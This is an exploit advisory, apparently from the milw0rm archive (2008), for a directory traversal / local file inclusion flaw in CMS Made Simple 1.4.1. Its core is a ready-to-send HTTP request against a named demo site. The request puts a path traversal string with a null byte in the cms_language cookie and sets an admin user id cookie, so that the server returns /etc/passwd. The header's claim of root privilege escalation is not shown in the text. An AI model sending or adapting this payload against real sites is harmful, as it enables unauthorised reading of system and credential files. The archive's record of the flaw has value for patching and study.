1 Type: Directory Traversal vulnerability (Unix tested) / Root privileges escalation
2 Vendor: CMS Made Simple
3 Software: CMS Made Simple 1.4.1 "Spring Garden" (and probably others ...)
4 Author: M4ck−h@cK
5 Date 29.11.2008
6 Home: sweet home
7 contact: no, thx :)
8
9 Exploit:
10
11
12 Demo: on h[ttp://demo.cmsmadesimple.fr/admin/]
13
14 GET http://demo.cmsmadesimple.fr/admin/login.php HTTP/1.0
15 Accept: */*
16 User−Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
17 Host: demo.cmsmadesimple.fr
18 Cookie: cms_language=../../../../../../../../etc/passwd%00.html;cms_admin_user_id=1
19 Connection: Close
20 Pragma: no−cache
21
22 It’s possible to set "cms_language" value in order to view /etc/passwd file.
23
24 # milw0rm.com [2008−11−29]
Page 1/1
CMS Made Simple 1.4.1 Local File Inclusion Vulnerability
M4ck−h@cK
11/29/2008